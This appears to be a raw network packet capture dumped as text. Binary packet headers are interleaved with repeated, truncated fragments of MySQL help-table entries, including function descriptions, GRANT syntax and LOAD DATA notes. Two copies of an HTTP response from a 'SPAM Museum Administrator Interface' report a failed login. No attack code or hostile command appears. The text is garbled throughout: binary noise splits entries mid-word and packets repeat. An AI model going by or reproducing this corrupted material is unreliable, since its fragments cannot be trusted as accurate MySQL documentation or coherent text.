specification\ngreater than 255 is converted to the smallest TEXT type that can hold\nvalues of the given length. For example, CHAR(500) is converted to\nTEC( bbBi0`ET@/˃2o0E \'A\'',''),(50,'=',26,' =\nEqual:\n','mysql> SELECT 1 = 0;\n -> 0\nmysql> SELECT \'0\' = 0;\n -> 1\nmysql> SELECT \'0.0\' = 0;\n -> 1\nmysql> SELECT \'0.01\' = 0;\n -> 0\nmysql> SELECT \'.01\' = 0.01;\n -> 1',''),(51,'REVERSE',23,' REVERSE(str)\nReturns the string str with the order of the characters reversed.\n','mysql> SELECT REVERSE(\'abc\');\n -> \'cba\'',''),(52,'ISNULL',26,' ISNULL(expr)\nIf expr is NULL, ISNULL() returns 1, otherwise\nit returns 0.\n','mysql> SELECT ISNULL(1+1);\n -> 0\nmysql> SELECT ISNULL(1/0);\n -> 1',''),(53,'BINARY',1,' BINARY(M)\n\nThe BINARY type is similar to the CHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(54,'BOUNDARY',19,' Boundary(g)\nReturns a geometry that is the closure of the combinatorial boundary of the\ngeometry value g.\n','',''),(55,'CREATE USER',7,'The CREATE USER statement creates new MySQL accounts. To use it, you\nmust have the global CREATE USER privilege or the INSERT\nprivilege for the mysql database.\nFor each account, CREATE USER creates a new record in the\nmysql.user table that has no privileges. An error occurs if the\naccC( bb0`BiET@/o0AE \'A\'',''),(50,'=',26,' =\nEqual:\n','mysql> SELECT 1 = 0;\n -> 0\nmysql> SELECT \'0\' = 0;\n -> 1\nmysql> SELECT \'0.0\' = 0;\n -> 1\nmysql> SELECT \'0.01\' = 0;\n -> 0\nmysql> SELECT \'.01\' = 0.01;\n -> 1',''),(51,'REVERSE',23,' REVERSE(str)\nReturns the string str with the order of the characters reversed.\n','mysql> SELECT REVERSE(\'abc\');\n -> \'cba\'',''),(52,'ISNULL',26,' ISNULL(expr)\nIf expr is NULL, ISNULL() returns 1, otherwise\nit returns 0.\n','mysql> SELECT ISNULL(1+1);\n -> 0\nmysql> SELECT ISNULL(1/0);\n -> 1',''),(53,'BINARY',1,' BINARY(M)\n\nThe BINARY type is similar to the CHAR type, but stores\nbinary byte strings rather than non-binary character strings.\n\nThis type was added in MySQL 4.1.2.\n','',''),(54,'BOUNDARY',19,' Boundary(g)\nReturns a geometry that is the closure of the combinatorial boundary of the\ngeometry value g.\n','',''),(55,'CREATE USER',7,'The CREATE USER statement creates new MySQL accounts. To use it, you\nmust have the global CREATE USER privilege or the INSERT\nprivilege for the mysql database.\nFor each account, CREATE USER creates a new record in the\nmysql.user table that has no privileges. An error occurs if the\naccC) bbBi0`ET@/p܂Ao0E<@?  3Pa f )Z> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. The string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' SESSION_USER()\n\nSESSION_USER() is a synonym for USER().\n','',''),(311,'QUARTER',14,' QUARTER(date)\nReturns the quarter of the year for date, in the range 1\nto 4.\n','mysql> SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connectioC) bbBi0`ET@/4 o0E<@?[  P@ =C) ZZBi0`EL@/܂Sŀo0E4SZ@?% 3 PtW't< )mWC) bb0`BiET@/Ԁo0SE<@@  3Pa f )Z> 1',''),(309,'QUOTE',23,' QUOTE(str)\nQuotes a string to produce a result that can be used as a properly escaped\ndata value in an SQL statement. The string is returned surrounded by single\nquotes and with each instance of single quote (\'\'\'), backslash (\'\\\'),\nASCII NUL, and Control-Z preceded by a backslash. If the argument is\nNULL, the return value is the word ``NULL\'\' without surrounding\nsingle quotes.\nThe QUOTE() function was added in MySQL 4.0.3.\n','mysql> SELECT QUOTE(\'Don\\\'t!\');\n -> \'Don\\\'t!\'\nmysql> SELECT QUOTE(NULL);\n -> NULL',''),(310,'SESSION_USER',25,' SESSION_USER()\n\nSESSION_USER() is a synonym for USER().\n','',''),(311,'QUARTER',14,' QUARTER(date)\nReturns the quarter of the year for date, in the range 1\nto 4.\n','mysql> SELECT QUARTER(\'98-04-01\');\n -> 2',''),(312,'POSITION',23,' POSITION(substr IN str)\n\nPOSITION(substr IN str) is a synonym for LOCATE(substr,str).\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\',5);\n -> 7',''),(313,'IS_USED_LOCK',21,' IS_USED_LOCK(str)\nChecks whether the lock named str is in use (that is, locked).\nIf so, it returns the connectioC) bb0`BiET@/gԀo0IE<@@Z  PA =C) ZZ0`BiEL@/go0AE4SZ@@% 3 PtW't< )mWCt+  Bi0`E@/M߃lo0Er@?'  P&:>ʈ ~ y-aGHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Transfer-Encoding: chunked Content-Type: text/html 1bd SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C+  0`BiE@/ko0AEr@@'  P&:>ʈ ~ y-aGHTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:40:10 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Connection: close Transfer-Encoding: chunked Content-Type: text/html 1bd SPAM Museum Administrator Interface

Could not understand user name or wrong password!!

C, bbBi0`ET@/˃2o0E SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,'C2 bb0`BiET@/Ԁo0SE<*@@  3P႟b 0 )Ze. This\nis also quite nice when you need a column that can take only two values: A\nCHAR(0) column that is not defined as NOT NULL occupies only\none bit and can take only the values NULL and \'\' (the empty\nstring).\n\n CHAR\nThis is a synonym for CHAR(1).\n','',''),(338,'UTC_DATE',14,' UTC_DATE\n UTC_DATE()\nReturns the current UTC date as a value in \'YYYY-MM-DD\' or\nYYYYMMDD format, depending on whether the function is used in a\nstring or numeric context.\n','mysql> SELECT UTC_DATE(), UTC_DATE() + 0;\n -> \'2003-08-14\', 20030814',''),(339,'DIMENSION',19,' Dimension(g)\nReturns the inherent dimension of the geometry value g. The result\ncan be -1, 0, 1, or 2. (The meaning of these values is given in\n[GIS class geometry].)\n','mysql> SELECT Dimension(GeomFromText(\'LineString(1 1,2 2)\'));\n+------------------------------------------------+\n| Dimension(GeomFromText(\'LineString(1 1,2 2)\')) |\n+------------------------------------------------+\n| 1 |\n+------------------------------------------------+',''),(340,'COUNT DISTINCT',12,' COUNT(DISTINCT expr,[expr...])\nReturns a count of the number of different non-NULL values.\n','mysql> SELECT COUNT(DISTINCT results) FROM student;',''),(341,'BIT',1,'CC3 ZZBi0`EL@/܂Sŀo0E4S^@?! 3 PtW't )n[CT3 ZZ0`BiEL@/go0AE4S^@@! 3 PtW't )n[C<4 ZZBi0`EL@/ 6o+Po0E4&g@?e  PWGP7 `tacCN4 ZZ0`BiEL@/܀o0SE4&g@@e  PWGP7 `tacC06 bbBi0`ET@/˃2o0E DELETE FROM mysql.user\n -> WHERE User=\'user_name\' and Host=\'host_name\';\nmysql> FLUSH PRIVILEGES;\n\n\n @subsubsection GRANT and REVOKE Syntax\n\n\n\n\nGRANT priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n TO user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...\n [REQUIRE\n NONE |\n [{SSL| X509}]\n [CIPHER \'cipher\' [AND]]\n [ISSUER \'issuer\' [AND]]\n [SUBJECT \'subject\']]\n [WITH with_option [with_option] ...]\n\nobject_type =\n TABLE\n | FUNCTION\n | PROCEDURE\n\nwith_option =\n GRANT OPTION\n | MAX_QUERIES_PER_HOUR count\n | MAX_UPDATES_PER_HOUR count\n | MAX_CONNECTIONS_PER_HOUR count\n | MAX_USER_CONNECTIONS count\n\nREVOKE priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n FROM user [, user] ...\n\nREVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...\n\n\nThe GRANT and REVOKE statements allow system administrators to\ncreate MySQL user accounts and to grant rights to and revoke tCC6 bb0`BiET@/o0AE DELETE FROM mysql.user\n -> WHERE User=\'user_name\' and Host=\'host_name\';\nmysql> FLUSH PRIVILEGES;\n\n\n @subsubsection GRANT and REVOKE Syntax\n\n\n\n\nGRANT priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n TO user [IDENTIFIED BY [PASSWORD] \'password\']\n [, user [IDENTIFIED BY [PASSWORD] \'password\']] ...\n [REQUIRE\n NONE |\n [{SSL| X509}]\n [CIPHER \'cipher\' [AND]]\n [ISSUER \'issuer\' [AND]]\n [SUBJECT \'subject\']]\n [WITH with_option [with_option] ...]\n\nobject_type =\n TABLE\n | FUNCTION\n | PROCEDURE\n\nwith_option =\n GRANT OPTION\n | MAX_QUERIES_PER_HOUR count\n | MAX_UPDATES_PER_HOUR count\n | MAX_CONNECTIONS_PER_HOUR count\n | MAX_USER_CONNECTIONS count\n\nREVOKE priv_type [(column_list)] [, priv_type [(column_list)]] ...\n ON [object_type] {tbl_name | * | *.* | db_name.*}\n FROM user [, user] ...\n\nREVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...\n\n\nThe GRANT and REVOKE statements allow system administrators to\ncreate MySQL user accounts and to grant rights to and revoke tC*7 bbBi0`ET@/p܂Ao0E SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nC<7 bb0`BiET@/Ԁo0SE SELECT LENGTH(\'text\');\n -> 4',''),(317,'DISTANCE',11,' Distance(g1,g2)\nReturns as a double-precision number\nthe shortest distance between any two points in the two geometries.\n','',''),(318,'STR_TO_DATE',14,' STR_TO_DATE(str,format)\nThis is the reverse function of the DATE_FORMAT() function. It takes a\nstring str and a format string format.\nC: bbBi0`ET@/˃2o0E SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+---------------C; bb0`BiET@/Ԁo0SE SELECT STR_TO_DATE(\'2003-10-03\');\n@c -> 2003-10-03 00:00:00\nmysql> SELECT STR_TO_DATE(\'03.10.2003 09.20\',\n -> \'%d.%m.%Y %H.%i\');\n -> \'2003-10-03 09:20:00\'\nmysql> SELECT STR_TO_DATE(\'10arp\', \'%carp\');\n -> \'0000-10-00 00:00:00\'\nmysql> SELECT STR_TO_DATE(\'2003-15-10 00:00:00\',\n -> \'%Y-%m-%d %H:%i:%s\');\n -> NULL',''),(319,'Y',16,' Y(p)\nReturns the Y-coordinate value for the point p as a double-precision\nnumber.\n','mysql> SELECT Y(GeomFromText(\'Point(56.7 53.34)\'));\n+---------------C> bbBi0`ET@/˃2o0E SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+---------------------------------------+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\n+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReC@ bb0`BiET@/Ԁo0SE SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT NumInteriorRings(GeomFromText(@poly));\n+---------------------------------------+\n| NumInteriorRings(GeomFromText(@poly)) |\n+---------------------------------------+\n| 1 |\n+---------------------------------------+',''),(321,'INTERIORRINGN',0,' InteriorRingN(poly,n)\nReturns the n-th interior ring for the Polygon value\npoly as a LineString.\nRing numbers begin at 1.\n','mysql> SET @poly =\n -> \'Polygon((0 0,0 3,3 3,3 0,0 0),(1 1,1 2,2 2,2 1,1 1))\';\nmysql> SELECT AsText(InteriorRingN(GeomFromText(@poly),1));\n+----------------------------------------------+\n| AsText(InteriorRingN(GeomFromText(@poly),1)) |\n+----------------------------------------------+\n| LINESTRING(1 1,1 2,2 2,2 1,1 1) |\n+----------------------------------------------+',''),(322,'UTC_TIME',14,' UTC_TIME\n UTC_TIME()\nReC]C bbBi0`ET@/˃2o0E SELECT USER();\n -> \'davida@localhost\'\nmysql> SELECT * FROM mysql.user;\nERROR 1044: Access denied for user \'\'@\'localhost\' to\ndatabase \'mysql\'\nmysql> SELECT CURRENT_USER();\n -> \'@localhost\'',''),(58,'LCASE',23,' LCASE(str)\n\nLCASE() is a synonym for LOWER().\n','',''),(59,'<=',26,' <=\nLess than or equal:\n','mysql> SELECT 0.1 <= 2;\n -> 1',''),(60,'UPDATE',6,'The UPDATE statement updates columns in existing table rows with\nnew values. The SET clause indicates which columns to modify\nand the values they should be given. The WHERE clause, if given,\nspecifies which rows should be updated. Otherwise, all rows are updated. If\nthe ORDER BY clause is specified, the rows are updated in the\norder that is specified. The LIMIT clause places a limit on the\nnumber of rows that can be updated.\n\nThe UPDATE statement supports the following modifiers:\n\n\n --- If you specify the LOW_PRICoC bb0`BiET@/o0AE SELECT USER();\n -> \'davida@localhost\'\nmysql> SELECT * FROM mysql.user;\nERROR 1044: Access denied for user \'\'@\'localhost\' to\ndatabase \'mysql\'\nmysql> SELECT CURRENT_USER();\n -> \'@localhost\'',''),(58,'LCASE',23,' LCASE(str)\n\nLCASE() is a synonym for LOWER().\n','',''),(59,'<=',26,' <=\nLess than or equal:\n','mysql> SELECT 0.1 <= 2;\n -> 1',''),(60,'UPDATE',6,'The UPDATE statement updates columns in existing table rows with\nnew values. The SET clause indicates which columns to modify\nand the values they should be given. The WHERE clause, if given,\nspecifies which rows should be updated. Otherwise, all rows are updated. If\nthe ORDER BY clause is specified, the rows are updated in the\norder that is specified. The LIMIT clause places a limit on the\nnumber of rows that can be updated.\n\nThe UPDATE statement supports the following modifiers:\n\n\n --- If you specify the LOW_PRICWD bbBi0`ET@/p܂Ao0E<[@?U  3Pdu}U . )Zturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMM.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\n','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number oCiD bb0`BiET@/Ԁo0SE<[@@T  3Pdu}U . )Zturns the current UTC time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT UTC_TIME(), UTC_TIME() + 0;\n -> \'18:07:53\', 180753',''),(323,'STDDEV',12,' STD(expr)\n STDDEV(expr)\nReturns the population standard deviation of expr. This is an\nextension to standard SQL. The STDDEV() form of this function is\nprovided for Oracle compatibility. As of MySQL 5.0.3, the standard SQL\nfunction STDDEV_POP() can be used instead.\n','',''),(324,'PERIOD_ADD',14,' PERIOD_ADD(P,N)\nAdds N months to period P (in the format YYMM or\nYYYYMM). Returns a value in the format YYYYMM.\nNote that the period argument P is /not/ a date value.\n','mysql> SELECT PERIOD_ADD(9801,2);\n -> 199803',''),(325,'|',27,' |\nBitwise OR:\n','mysql> SELECT 29 | 15;\n -> 31',''),(326,'GEOMFROMTEXT',3,' GeomFromText(wkt[,srid])\n GeometryFromText(wkt[,srid])\nConstructs a geometry value of any type using its WKT representation and SRID.\n','',''),(327,'RIGHT',23,' RIGHT(str,len)\nReturns the rightmost len characters from the string str.\n','mysql> SELECT RIGHT(\'foobarbar\', 4);\n -> \'rbar\'',''),(328,'DATEDIFF',14,' DATEDIFF(expr,expr2)\n\n\nDATEDIFF() returns the number oCD ZZBi0`EL@/܂Sŀo0E4S`@? 3 PtW't )o_CD ZZ0`BiEL@/go0AE4S`@@ 3 PtW't )o_CQE ZZBi0`EL@/Ao0E4-@?Z  ePZ>π!K e;_CdE ZZ0`BiEL@/o0  E4-@@Y  ePZ>π!K e;_CG bbBi0`ET@/˃2o0E SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The LOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou canCH bb0`BiET@/Ԁo0SE<\@@T  3Plu}U  )[f days between the start date\nexpr and the end date expr2.\nexpr and expr2 are date or date-and-time expressions.\nOnly the date parts of the values are used in the calculation.\n','mysql> SELECT DATEDIFF(\'1997-12-31 23:59:59\',\'1997-12-30\');\n -> 1\nmysql> SELECT DATEDIFF(\'1997-11-30 23:59:59\',\'1997-12-31\');\n -> -31',''),(329,'BIN',23,' BIN(N)\nReturns a string representation of the binary value of N, where\nN is a longlong (BIGINT) number. This is equivalent to\nCONV(N,10,2). Returns NULL if N is NULL.\n','mysql> SELECT BIN(12);\n -> \'1100\'',''),(330,'MULTILINESTRING',2,' MultiLineString(ls1,ls2,...)\nConstructs a WKB MultiLineString value using WKB LineString\narguments. If any argument is not a WKB LineString, the return\nvalue is NULL.\n','',''),(331,'LOAD DATA',6,'The LOAD DATA INFILE statement reads rows from a text file into a\ntable at a very high speed.\nFor more information about the efficiency of INSERT versus\nLOAD DATA INFILE and speeding up LOAD DATA INFILE,\n[Insert speed].\n\nAs of MySQL 4.1, the character set indicated by the\ncharacter_set_database system variable is used to interpret the\ninformation in the file. SET NAMES and the setting of\ncharacter_set_client do not affect input interpretation.\n\nYou canC!M bbBi0`ET@/˃2o0E SELECT id, body, MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\') AS score\n -> FROM articles WHERE MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\');\n+----+-------------------------------------+-----------------+\n| id | body | score |\n+----+-------------------------------------+-----------------+\n| 4 | 1. Never run mysqld as root. 2. ... | 1.5219271183014 |\n| 6 | When configured properly, MySQL ... | 1.3114095926285 |\n+----+-------------------------------------+-----------------+\n2 rows in set (0.00 sec)',''),(63,'ABS',4,' ABS(X)\nReturns the absolute value of X.\n','mysql> SELECT ABS(2);\n -> 2\nmysql> SELECT ABS(-32);\n -> 32',''),(64,'POLYFROMWKB',13,' PolyFromWKB(wkb[,srid])\n PolygonFromWKB(wkb[,srid])\nConstructs a POLYGON value using its WKB representation and SRID.\n','',''),(65,'NOT LIKE',23,' expr NOT LIKE pat [ESCAPE \'escape-char\']\n\nThis is the same as NOT (expr LIKE pat [C(M bbBi0`ET@/p܂Ao0E<]@?U  3Ptu}U  )[ also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it contains no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the performance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto specify its exact location. If given as a relative pathname, the name is\ninterpreted relative to the direC,M ZZBi0`EL@/܂Sŀo0E4Sb@? 3 PtW't )o`C SELECT id, body, MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\') AS score\n -> FROM articles WHERE MATCH (title,body) AGAINST\n -> (\'Security implications of running MySQL as root\');\n+----+-------------------------------------+-----------------+\n| id | body | score |\n+----+-------------------------------------+-----------------+\n| 4 | 1. Never run mysqld as root. 2. ... | 1.5219271183014 |\n| 6 | When configured properly, MySQL ... | 1.3114095926285 |\n+----+-------------------------------------+-----------------+\n2 rows in set (0.00 sec)',''),(63,'ABS',4,' ABS(X)\nReturns the absolute value of X.\n','mysql> SELECT ABS(2);\n -> 2\nmysql> SELECT ABS(-32);\n -> 32',''),(64,'POLYFROMWKB',13,' PolyFromWKB(wkb[,srid])\n PolygonFromWKB(wkb[,srid])\nConstructs a POLYGON value using its WKB representation and SRID.\n','',''),(65,'NOT LIKE',23,' expr NOT LIKE pat [ESCAPE \'escape-char\']\n\nThis is the same as NOT (expr LIKE pat [CHM bb0`BiET@/Ԁo0SE<]@@T  3Ptu}U  )[ also load data files by using the mysqlimport utility; it\noperates by sending a LOAD DATA INFILE statement to the server. The\n--local option causes mysqlimport to read data files from the\nclient host. You can specify the --compress option to get better\nperformance over slow networks if the client and server support the\ncompressed protocol.\nSee also : [mysqlimport, , mysqlimport].\n\nIf you specify the LOW_PRIORITY keyword, execution of the\nLOAD DATA statement is delayed until no other clients are reading\nfrom the table.\n\nIf you specify the CONCURRENT keyword with a MyISAM table that\nsatisfies the condition for concurrent inserts (that is, it contains no free\nblocks in the middle),\nthen other threads can retrieve data from the table while LOAD DATA\nis executing. Using this option affects the performance of LOAD DATA\na bit, even if no other thread is using the table at the same time.\n\nIf the LOCAL keyword is specified, it is\ninterpreted with respect to the client end of the connection:\n\n\n --- If LOCAL is specified, the file is read by the client program on the\nclient host and sent to the server. The file can be given as a full pathname\nto specify its exact location. If given as a relative pathname, the name is\ninterpreted relative to the direCRM ZZ0`BiEL@/go0AE4Sb@@ 3 PtW't )o`CQ bbBi0`ET@/˃2o0E SELECT 20000 SPACE(6);\n -> \' \'',''),(67,'MBR DEFINITION',8,'Every geometry occupies some position in space. The exterior of\na geometry is all space not occupied by the geometry. The interior\nis the space occupied by the geometry. The boundary is the\ninterface between the geometry\'s interior and exterior.\n\n --- Its MBR (Minimum Bounding Rectangle), or Envelope.\nThis is the bounding geometry, formed by the minimum and maximum (X,Y)\ncoordinates:\n','((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))',''),(68,'GEOMETRYCOLLECTION',2,' GeometryCollection(g1,g2,...)\nConstructs a WKB GeometryCollection. If any argument is not a\nwell-formed WKB representation of a geometry, the return value is\nNULL.\n','',''),(69,'*',4,' *\nMultiplication:\n','mysql> SELECT 3*5;\n -> 15\nmysql> SELECT 18014398509481984*18014398509481984.0;\n -> 324518553658426726783156020576256.0\nmysql> SELECT 18014398509481984*18014398509481984;\n -> 0',''),(70,'TIMESTAMP',1,' TIMESTAMP[(M)]\n\nA timestamp. The range is \'1970-01-01 00:00:00\' to partway through the\nyear 2037.\n\nA TIMESTAMP column is useful for recordiCQ bb0`BiET@/o0AE SELECT 20000 SPACE(6);\n -> \' \'',''),(67,'MBR DEFINITION',8,'Every geometry occupies some position in space. The exterior of\na geometry is all space not occupied by the geometry. The interior\nis the space occupied by the geometry. The boundary is the\ninterface between the geometry\'s interior and exterior.\n\n --- Its MBR (Minimum Bounding Rectangle), or Envelope.\nThis is the bounding geometry, formed by the minimum and maximum (X,Y)\ncoordinates:\n','((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))',''),(68,'GEOMETRYCOLLECTION',2,' GeometryCollection(g1,g2,...)\nConstructs a WKB GeometryCollection. If any argument is not a\nwell-formed WKB representation of a geometry, the return value is\nNULL.\n','',''),(69,'*',4,' *\nMultiplication:\n','mysql> SELECT 3*5;\n -> 15\nmysql> SELECT 18014398509481984*18014398509481984.0;\n -> 324518553658426726783156020576256.0\nmysql> SELECT 18014398509481984*18014398509481984;\n -> 0',''),(70,'TIMESTAMP',1,' TIMESTAMP[(M)]\n\nA timestamp. The range is \'1970-01-01 00:00:00\' to partway through the\nyear 2037.\n\nA TIMESTAMP column is useful for recordiCQ bbBi0`ET@/p܂Ao0E<*@?  3P抟b  )\ BIT[(M)]\n\nA bit-field type. M indicates the number of bits per value, from 1 to\n64. The default is 1 if M is omitted.\n\nThis data type was added in MySQL 5.0.3 for MyISAM, and extended\nin 5.0.5 to MEMORY, InnoDB, and BDB. Before 5.0.3,\nBIT is a synonym for TINYINT(1).\n','',''),(342,'EQUALS',11,' Equals(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 is spatially equal to\ng2.\n','',''),(343,'SHOW CREATE VIEW',24,'This statement shows a CREATE VIEW statement that creates\nthe given view.\n','SHOW CREATE VIEW view_name',''),(344,'INTERVAL',26,' INTERVAL(N,N1,N2,N3,...)\nReturns 0 if N < N1, 1 if N < N2\nand so on or -1 if N is NULL. All arguments are treated\nas integers. It is required that N1 < N2 < N3 <\n... < Nn for this function to work correctly. This is because\na binary search is used (very fast).\n','mysql> SELECT INTERVAL(23, 1, 15, 17, 30, 44, 200);\n -> 3\nmysql> SELECT INTERVAL(10, 1, 10, 100, 1000);\n -> 2\nmysql> SELECT INTERVAL(22, 23, 30, 44, 200);\n -> 0',''),(345,'FROM_DAYS',14,' FROM_DAYS(N)\nGiven a daynumber N, returns a DATE value.\n','mysql> SELECT FROM_DAYS(729669);\n -> \'1997-10-07\'',''),(346,'BIT_COUNT',27,' BIT_COUNT(N)\nReturns the number of bits that are set in the argument N.\n','mysqlCQ 